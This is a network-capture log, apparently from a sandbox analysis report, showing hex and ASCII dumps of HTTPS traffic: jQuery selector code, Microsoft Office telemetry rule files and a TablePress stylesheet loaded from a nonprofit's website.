                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 76 61 72 20 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69
                                                                                                                                                                                                                              Data Ascii: n e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function F(e){return e[S]=!0,e}function $(e){var t=T.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}functi
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: 63 74 6f 72 41 6c 6c 28 22 3a 73 63 6f 70 65 22 29 7d 29 2c 6c 65 2e 63 73 73 48 61 73 3d 24 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 54 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 3a 68 61 73 28 2a 2c 3a 6a 71 66 61 6b 65 29 22 29 2c 21 31 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 30 7d 7d 29 2c 6c 65 2e 67 65 74 42 79 49 64 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65
                                                                                                                                                                                                                              Data Ascii: ctorAll(":scope")}),le.cssHas=$(function(){try{return T.querySelector(":has(*,:jqfake)"),!1}catch(e){return!0}}),le.getById?(b.filter.ID=function(e){var t=e.replace(O,P);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("unde
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 64 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 28 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 64 2e 70 75 73 68 28 22 3a 65 6e 61
                                                                                                                                                                                                                              Data Ascii: .#.+[+~]"),e.querySelectorAll(":checked").length||d.push(":checked"),(t=T.createElement("input")).setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),r.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&d.push(":ena
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: 2c 21 43 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 7d 2c 49 2e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 53 79 6e 74 61 78 20 65 72 72 6f 72 2c 20 75 6e 72 65 63 6f 67 6e 69 7a 65 64 20 65 78 70 72 65 73 73 69 6f 6e 3a 20 22 2b 65 29 7d 2c 63 65 2e 75 6e 69 71 75 65 53 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 5b 5d 2c 72 3d 30 2c 69 3d 30 3b 69 66 28 61 3d 21 6c 65 2e 73 6f 72 74 53 74 61 62 6c 65 2c 6f 3d 21 6c 65 2e 73 6f 72 74 53 74 61 62 6c 65 26 26 61 65 2e 63 61 6c 6c 28 65 2c 30 29 2c 64 65 2e 63 61 6c 6c 28 65 2c 6c 29 2c 61 29 7b 77 68 69 6c 65 28 74 3d 65 5b
                                                                                                                                                                                                                              Data Ascii: ,!C):void 0;return void 0!==r?r:e.getAttribute(t)},I.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},ce.uniqueSort=function(e){var t,n=[],r=0,i=0;if(a=!le.sortStable,o=!le.sortStable&&ae.call(e,0),de.call(e,l),a){while(t=e[


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              33192.168.2.64975713.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:03 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                              x-ms-request-id: bb9292ef-d01e-00ad-5d35-21e942000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180403Z-r1755647c66lljn2k9s29ch9ts00000008pg000000002gxu
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              34192.168.2.64976013.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:03 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 464
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                              x-ms-request-id: b1dca041-701e-0001-1ae2-20b110000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180403Z-r1755647c66z4pt7cv1pnqayy400000008gg00000000aywq
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              35192.168.2.64975813.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:03 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                              x-ms-request-id: 5e1d4904-301e-0020-1550-236299000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180403Z-17fbfdc98bb2fzn810kvcg2zng000000069g000000003aat
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              36192.168.2.64975913.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:03 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                              x-ms-request-id: 0b49af96-c01e-0079-7092-1fe51a000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180403Z-r1755647c66ww2rh494kknq3r0000000099000000000b28n
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              37192.168.2.64976113.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:03 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                              x-ms-request-id: b4b04932-601e-0050-10e3-202c9c000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180403Z-r1755647c66ldfgxa3qp9d53us00000008h000000000a2px
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              38192.168.2.649764141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC601OUTGET /wp-content/uploads/hummingbird-assets/a61b308d4d6be7261fc816f90a3413fb.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC478INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:04 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:53:29 GMT
                                                                                                                                                                                                                              ETag: W/"670fd369-1857"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614815
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5be2f976c7a-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC891INData Raw: 31 38 35 37 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 74 61 62 6c 65 70 72 65 73 73 2d 64 65 66 61 75 6c 74 2a 2a 2f 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 62 6c 65 50 72 65 73 73 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 73 72 63 3a 75 72 6c 28 64 61 74 61 3a 61 70 70 6c 69 63 61 74 69 6f 6e 2f 66 6f 6e 74 2d 77 6f 66 66 32 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3b 62 61 73 65 36 34 2c 64 30 39 47 4d 67 41 42 41 41 41 41 41 41 50 55 41 41 30 41 41 41 41 41 43 5a 41 41 41 41 4e 2b 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 30 5a 47 56 45 30
                                                                                                                                                                                                                              Data Ascii: 1857/**handles:tablepress-default**/@font-face{font-display:block;font-family:TablePress;font-style:normal;font-weight:400;src:url(data:application/font-woff2;charset=utf-8;base64,d09GMgABAAAAAAPUAA0AAAAACZAAAAN+AAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1369INData Raw: 79 70 58 30 4a 4e 44 2f 6b 69 34 70 37 31 43 51 51 6c 46 71 6e 41 76 6b 69 6a 41 42 72 56 46 49 71 35 42 64 4e 4a 62 46 6e 63 6f 42 4f 46 30 33 2f 68 33 49 49 4e 50 51 52 42 78 4a 43 59 44 6f 41 4f 6e 6b 52 49 44 52 30 77 30 42 53 6d 59 69 42 7a 44 69 6e 41 75 51 36 65 52 4f 67 30 44 45 47 59 36 44 55 69 45 55 59 71 4b 79 49 4c 77 46 71 32 71 53 39 47 4b 68 72 70 46 73 79 6b 64 65 46 4c 6d 44 6a 6b 6e 59 47 34 6a 4b 62 4e 65 4e 79 51 31 7a 68 43 6f 50 38 34 30 70 64 59 69 71 75 38 6a 54 57 34 6d 70 36 70 4d 58 48 31 48 56 4a 70 38 77 52 6d 48 6d 51 4b 54 4b 69 55 4f 42 56 53 4d 48 72 6c 4b 75 42 6c 59 69 64 78 6b 4d 67 77 36 2f 62 4d 6f 47 35 52 44 36 71 66 73 38 79 4f 38 4c 56 71 46 43 46 61 38 45 4c 72 63 56 4c 45 71 54 61 53 37 55 47 35 61 71 56 71 31
                                                                                                                                                                                                                              Data Ascii: ypX0JND/ki4p71CQQlFqnAvkijABrVFIq5BdNJbFncoBOF03/h3IINPQRBxJCYDoAOnkRIDR0w0BSmYiBzDinAuQ6eROg0DEGY6DUiEUYqKyILwFq2qS9GKhrpFsykdeFLmDjknYG4jKbNeNyQ1zhCoP840pdYiqu8jTW4mp6pMXH1HVJp8wRmHmQKTKiUOBVSMHrlKuBlYidxkMgw6/bMoG5RD6qfs8yO8LVqFCFa8ELrcVLEqTaS7UG5aqVq1
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1369INData Raw: 70 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 29 7d 2e 74 61 62 6c 65 70 72 65 73 73 3e 3a 77 68 65 72 65 28 74 68 65 61 64 2c 74 66 6f 6f 74 29 3e 2a 3e 74 68 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 68 65 61 64 2d 62 67 2d 63 6f 6c 6f 72 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 68 65 61 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 2e 74 61 62 6c 65 70 72 65 73 73 3e 3a 77 68 65 72 65 28 74 62 6f 64 79 29 3e 74 72 3e 2a 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 7d 2e 74 61 62 6c 65 70 72
                                                                                                                                                                                                                              Data Ascii: p:1px solid var(--border-color)}.tablepress>:where(thead,tfoot)>*>th{background-color:var(--head-bg-color);color:var(--head-text-color);font-weight:700;vertical-align:middle;word-break:normal}.tablepress>:where(tbody)>tr>*{color:var(--text-color)}.tablepr
